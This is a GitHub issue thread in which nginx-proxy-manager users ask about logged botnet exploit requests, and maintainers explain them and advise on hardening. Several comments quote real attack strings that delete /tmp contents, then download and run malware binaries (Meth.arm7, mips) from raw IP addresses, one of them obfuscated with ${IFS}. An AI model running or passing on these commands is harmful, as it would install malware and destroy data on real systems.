### ISSUE TITLE
Malware Sites access from Nginx Proxy Manager

### ISSUE THREAD

**Issue by geek-baba** [jc21/nginx-proxy-manager#465]
I am not very sure what category I should put this into but my firewall is blocking traffic from Nginx Proxy Manager that is trying to access the following site:

http://[37.49.224.183:80]/shell?cd+/tmp;rm+-rf+*;wget+37.49.224.183/YaO2uFOvUG8LV1y5NY1aCHmr1WdBLjcjiVD6aRRAWDL6oNY29J88y0nrXxaHBmTLEYC9yB56gBn95pco8kCbldVsHmjNQk8JTaC/Meth.arm7;chmod+777+/tmp/Meth.arm7;sh+/tmp/Meth.arm7+jaws.selfrep

Any insight into this?

**Comment by petross3530mx** [comment]
this is  shell script in url which tries to do following commands:

cd /tmp;
rm -rf *;
wget 37.49.224.183/YaO2uFOvUG8LV1y5NY1aCHmr1WdBLjcjiVD6aRRAWDL6oNY29J88y0nrXxaHBmTLEYC9yB56gBn95pco8kCbldVsHmjNQk8JTaC/Meth.arm7;
chmod 777 /tmp/Meth.arm7;
sh /tmp/Meth.arm7 jaws.selfrep

**Comment by geek-baba** [comment]
Ok - whats the purpose of this command, what is it looking to get from the URl...

**Comment by geek-baba** [comment]
@jc21 - for real?

**Comment by geek-baba** [comment]
I just switched to [TygerCaddy](https://www.tygercaddy.com/), almost similar or better functionality since I was not sure what was going on. Also if you like to manage Nginx with little more technical knowledge you can also try [The Perfect Reverse Proxy](https://tylermade.net/2017/09/14/the-perfect-reverse-proxy-nginx-ssl-webui-management/).

**Comment by bmcgonag** [comment]
Can anyone confirm this. I'm monitoring my system, and not seeing this at all...doesn't mean it's not there...but not seeing this request.

**Comment by geek-baba** [comment]
Just to confirm this does not happen everyday, if I remember I see this every week or 2 weeks. I can submit the detailed logs from my firewall (untangle) if anyone is investigating, I switched because did not see the response on this topic for almost a month.

**Comment by dgraziotin** [comment]
I do not see this entry on my systems (running nginx-proxy-manager). 

This looks like a typical exploit attempt, which may be automated (so you are not a direct intended target and just got caught in it) or manual (somebody is trying to actively hack you). Web servers receive attacks like this one on a daily basis, regretfully.

I do not see why nginx-proxy-manager would do this by itself. I mean, the source code is public :-)

**Comment by jc21** [comment]
It sounds like I need to be clearer on what NPM does. It merely writes configuration files for Nginx to (mainly) forward web requests. These files are visible on disk for anyone to observe.

It does not control the traffic before it arrives, in this case an attempt to install malware on your server. Nor does it execute any server side code outside of its own admin interface api.

However, since nginx is just forwarding requests to your upstream host, your host might be susceptible to this attack; and that’s out of NPM’s control.

You said your firewall blocked this incoming request, good! That’s it’s job.

**Comment by geek-baba** [comment]
@dgraziotin - I never doubted that its an intended exploit, could have been a Nginx bug or anything, I was using this for over a month after reporting this and I did not see another attempt.

@jc21 - yeah thats my understanding how the NPM works, however the only issue I saw that the traffic was originating from the box running NPM, not the other way round.

**Comment by alderson59** [comment]
@geek-baba - when you say "box", are you referring to the docker container, or do you have other files and apps on the "box" if you're referring to the machine. Do you have other docker containers on the machine, running other apps and services?

**Comment by geek-baba** [comment]
@alderson59 - its a VM just running just docker and NPM.

**Comment by STUKguy** [comment]
Can someone help i keep getting this error

[9/19/2020] [7:36:32 PM] [Global   ] › ✖  error     getaddrinfo ENOTFOUND lu

**Comment by wolfy01** [comment]
Is it possible that this issue is fixed?

**Comment by gentlemenVap** [comment]
Is this still an issue?

**Comment by geek-baba** [comment]
Not really, it's the the service that's facing internet and you seethe attack time to time.

**Comment by chaptergy** [comment]
As this is no (longer) an issue, I will close this.

**Comment by rumbis** [comment]
> I am not very sure what category I should put this into but my firewall is blocking traffic from Nginx Proxy Manager that is trying to access the following site:
> 
> http://[37.49.224.183:80]/shell?cd+/tmp;rm+-rf+*;wget+37.49.224.183/YaO2uFOvUG8LV1y5NY1aCHmr1WdBLjcjiVD6aRRAWDL6oNY29J88y0nrXxaHBmTLEYC9yB56gBn95pco8kCbldVsHmjNQk8JTaC/Meth.arm7;chmod+777+/tmp/Meth.arm7;sh+/tmp/Meth.arm7+jaws.selfrep
> 
> Any insight into this?
what firewall do you use ?

**Comment by chaptergy** [comment]
If requests like these in fact originate from the machine running your npm instance, your machine is already compromised and part of a bot-net trying to infect more machines. You should wipe your server and set it up again, since you can't know where the maleware is hiding. Make sure you harden your server like allowing only public-private-key-authentication to connect via ssh, or at the very least use a secure password that was randomly generated. Also disable the root login via ssh. There are a lot of blog posts and guides out there on how to harden your server.  
Also make sure your software always stays up to date. You can use software like [crowdsec](https://crowdsec.net) or [fail2ban](https://www.fail2ban.org) as a "dynamic firewall", though this is mainly for ssh access for now, as it is not officially integrated in npm yet. See https://github.com/NginxProxyManager/nginx-proxy-manager/issues/1131 and https://github.com/NginxProxyManager/nginx-proxy-manager/issues/39 as the feature requests.

**Comment by gitconsumer** [comment]
I'm having a similar issue, just installed nginx proxy manager and I'm seeing this:

[Date] 400 - GET http localhost "/bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://103.95.196.149/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;" [Client 190.219.152.91] [Length 252] [Gzip -] "-" "-"

Can anybody explain to me how this is happening? I'm planning to use this as a reverse proxy for photoprism which is running in another docker container.
Here is my proxy configuration (which never worked for me as I was just playing around):

<img width="475" alt="Screenshot 2023-07-02 at 21 23 23" src="https://github.com/NginxProxyManager/nginx-proxy-manager/assets/22961920/ae395b5f-3f50-453f-b046-91c9c287ed6f">


I don't quite understand where this request is coming from: from outside or from inside the network?

**Comment by gitconsumer** [comment]
@geek-baba 
Hi, did you manage to solve this issue? I'm having almost the same exact thing going on from time to time. 

`[03/Jul/2023:13:45:04 +0000] 400 - GET http localhost "/bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://103.95.196.149/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;" [Client 59.135.85.88] [Length 252] [Gzip -] "-" "-"`

I'm kinda clueless how this request is coming through. My current configuration is:

- two docker containers: nginx proxy manager and photoprism
- the only port open on the router is 443 (it's forwarded to 443 on nginx proxy manager docker container)
- no SSL certificate (so the configuration is actually invalid without the certificate and I can't get to anything from outside my home network using hostname or ip as NPM is blocking hand shake per default I think)
- one single host is proxied to photoprism which runs in a docker container on the host on port 2342

<img width="300" alt="Screenshot 2023-07-03 at 16 36 28" src="https://github.com/NginxProxyManager/nginx-proxy-manager/assets/22961920/37832bce-67a9-4233-bb2c-8c5493b97026">

I don't understand where this zyxel request is coming from and how is this possible that it shows http and localhost. Any way to track this down?
